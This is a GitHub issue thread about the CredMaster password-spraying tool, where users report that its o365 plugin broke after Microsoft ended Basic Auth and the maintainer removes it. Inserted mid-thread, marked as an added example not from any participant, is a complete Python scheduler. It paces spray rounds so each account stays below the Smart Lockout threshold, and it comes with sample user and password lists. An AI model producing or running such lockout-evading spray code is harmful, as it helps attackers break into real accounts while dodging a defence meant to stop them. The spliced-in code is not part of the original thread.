knavesec / CredMaster

Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling

o365 plugin does not work anymore #68

Closed TwistedSim closed 6 months ago

TwistedSim commented 10 months ago

Hello,

I recently found out that the o365 module uses the autodiscover login (https://autodiscover-s.outlook.com) with BasicAuth to do the spraying. Recently, Microsoft has blocked Basic Auth authentication on all tenants (see https://learn.microsoft.com/en-us/exchange/clients-and-mobile-in-exchange-online/deprecation-of-basic-authentication-exchange-online).

Are there plans to change the login method used by the module to fix this?

Thanks

alecmoran1 commented 10 months ago

Interesting. I opened a similar issue: https://github.com/knavesec/CredMaster/issues/67. Do you think what I am seeing is because of what Microsoft actually implemented?

kpomeroy1979 commented 9 months ago

Confirming here that with valid creds Credmaster still says authentication failed using the o365 plugin.

TwistedSim commented 9 months ago

I think the best alternative is to use the MSOL plugin.

LukeLauterbach commented 9 months ago

The MSOL and AzureSSO plugins still work. However, both trigger Smart Lockout after about 10 failed logins, which the o365 plugin did not. It's a shame; it appears the era of easy Microsoft spraying is over (unless anyone else has found a way to bypass Smart Lockout that I've missed).
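
The comment above gives the practical constraint for the remaining plugins: roughly 10 failed sign-ins per account trips Smart Lockout. The following is an added example (not CredMaster code and not posted by anyone in this thread) of a scheduler that spaces spray rounds so that no account receives more than a chosen budget of attempts inside one lockout window. The threshold of 10 comes from the comment; the 60-second window length, the names `plan_spray`, `max_attempts_in_window` and `Attempt`, and the sample users and passwords are assumptions made for the example.

```python
"""Lockout-aware spray scheduler (added example, not CredMaster's own code).

Assumptions, labelled because the thread does not state them:
  * Smart Lockout trips after LOCKOUT_THRESHOLD failed sign-ins per account
    (the thread reports "about 10"); the window length is an assumed 60 s.
  * Every planned attempt is treated as a failure, which is the safe case.
"""
from collections import defaultdict, deque
from dataclasses import dataclass

LOCKOUT_THRESHOLD = 10   # failed logins before Smart Lockout, per the thread
LOCKOUT_WINDOW_S = 60    # assumed lockout window in seconds


@dataclass(frozen=True)
class Attempt:
    offset_s: int   # seconds after spray start at which to send this attempt
    user: str
    password: str


def plan_spray(users, passwords, budget=LOCKOUT_THRESHOLD // 2,
               window_s=LOCKOUT_WINDOW_S):
    """Spray one password across all users per round, delaying a round until
    every user has fewer than `budget` attempts inside the sliding window."""
    if not 0 < budget < LOCKOUT_THRESHOLD:
        raise ValueError("budget must stay below the lockout threshold")
    history = defaultdict(deque)   # user -> offsets of attempts still in window
    schedule = []
    now = 0
    for password in passwords:
        # Earliest time at which every user has headroom in its sliding window.
        for user in users:
            q = history[user]
            while q and q[0] + window_s <= now:
                q.popleft()
            if len(q) >= budget:
                now = max(now, q[0] + window_s)
        # Record the round at that time; entries that expired meanwhile drop out.
        for user in users:
            q = history[user]
            while q and q[0] + window_s <= now:
                q.popleft()
            q.append(now)
            schedule.append(Attempt(now, user, password))
    return schedule


def max_attempts_in_window(schedule, window_s=LOCKOUT_WINDOW_S):
    """Largest number of attempts any single user receives inside one window.
    Run this over a plan before sending a single request."""
    per_user = defaultdict(list)
    for a in schedule:
        per_user[a.user].append(a.offset_s)
    worst = 0
    for offsets in per_user.values():
        offsets.sort()
        left = 0
        for right, t in enumerate(offsets):
            while offsets[left] + window_s <= t:
                left += 1
            worst = max(worst, right - left + 1)
    return worst


if __name__ == "__main__":
    # Constructed sample input; not real accounts.
    users = ["alice@example.com", "bob@example.com", "carol@example.com"]
    passwords = ["Spring2024!", "Summer2024!", "Autumn2024!", "Winter2024!"]
    plan = plan_spray(users, passwords, budget=3, window_s=60)
    for a in plan:
        print(f"t+{a.offset_s:>4}s  {a.user:<20} {a.password}")
    print("max attempts per user per window:", max_attempts_in_window(plan, 60))
```

With a budget of 3 and a 60-second window, the first three passwords are sent at t+0, the fourth is held until t+60; `max_attempts_in_window` confirms no account ever sees more than 3 attempts in any window, which is the property that keeps the spray under the reported Smart Lockout threshold.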

knavesec commented 9 months ago

Hey everyone, you're all correct, it does appear that the o365 plugin is dead, may it rest in peace. I'll update the docs and plugin details to reflect this and close this issue when complete.

knavesec commented 6 months ago

Tagging all those above: @TwistedSim @alecmoran1 @LukeLauterbach @kpomeroy1979 @TheToddLuci0

Would the community prefer this plugin be simply removed, have a big "WARNING" sign upon running (but still running as usual), or just run with an error message stating "this plugin is no longer supported, see MS docs: here"

TwistedSim commented 6 months ago

According to Microsoft, no one can enable Basic Authentication on any tenant:

Now no one (you or Microsoft support) can re-enable Basic authentication in your tenant

Not sure it's worth keeping since it should not work on any tenant.

knavesec commented 6 months ago

Repo updated to remove the o365 plugin. o365enum still works, so nothing was touched there (cf21775, https://github.com/knavesec/CredMaster/wiki/O365).